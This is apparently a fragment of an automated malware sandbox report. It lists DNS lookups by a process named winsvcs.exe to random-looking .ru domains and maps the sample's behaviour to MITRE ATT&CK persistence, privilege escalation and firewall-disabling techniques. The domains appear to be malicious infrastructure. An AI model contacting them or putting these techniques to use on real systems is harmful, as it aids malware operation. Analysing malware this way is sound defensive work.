auueieieiiighisf.ru
8.8.8.8:53

eoooeghgosofofjs.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

eoooeghgosofofjs.ru
8.8.8.8:53

eogoehoshefheguh.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

eogoehoshefheguh.ru
8.8.8.8:53

sgsourfsuofgsgur.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

sgsourfsuofgsgur.ru
8.8.8.8:53

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Modify Registry